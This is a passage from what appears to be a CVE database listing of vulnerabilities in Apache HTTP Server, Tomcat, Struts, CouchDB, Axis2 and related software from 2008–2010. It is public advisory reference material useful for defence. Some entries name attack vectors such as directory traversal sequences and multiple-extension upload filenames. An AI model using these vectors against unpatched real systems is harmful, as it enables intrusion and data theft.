5702| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
5703| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
5704| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
5705| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
5706| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5707| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
5708| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
5709| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
5710| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
5711| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
5712| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
5713| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
5714| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
5715| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
5716| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
5717| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
5718| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
5719| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
5720| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
5721| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
5722| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
5723| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
5724| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
5725| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
5726| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
5727| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
5728| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
5729| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
5730| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
5731| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
5732| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
5733| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
5734| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
5735| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
5736| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
5737| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
5738| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
5739| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
5740| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
5741| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
5742| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
5743| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
5744| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
5745| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
5746| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
5747| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5748| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
5749| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
5750| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
5751| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
5752| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
5753| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
5754| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
5755| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
5756| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
5757| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
5758| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
5759| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
5760| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
5761| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
5762| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
5763| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
5764| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
5765| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
5766| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
5767| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
5768| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
5769| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
5770| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
5771| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
5772| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
5773| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
5774| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
5775| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
5776| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
5777| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
5778| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
5779| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
5780| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
5781| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
5782| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
5783| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
5784| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
5785| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
5786| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
5787| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
5788| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
5789| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
5790| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
5791| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
5792| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
5793| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
5794| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
5795| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
5796| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
5797| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
5798| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
5799| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
5800| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
5801| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
5802| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
5803| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
5804| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
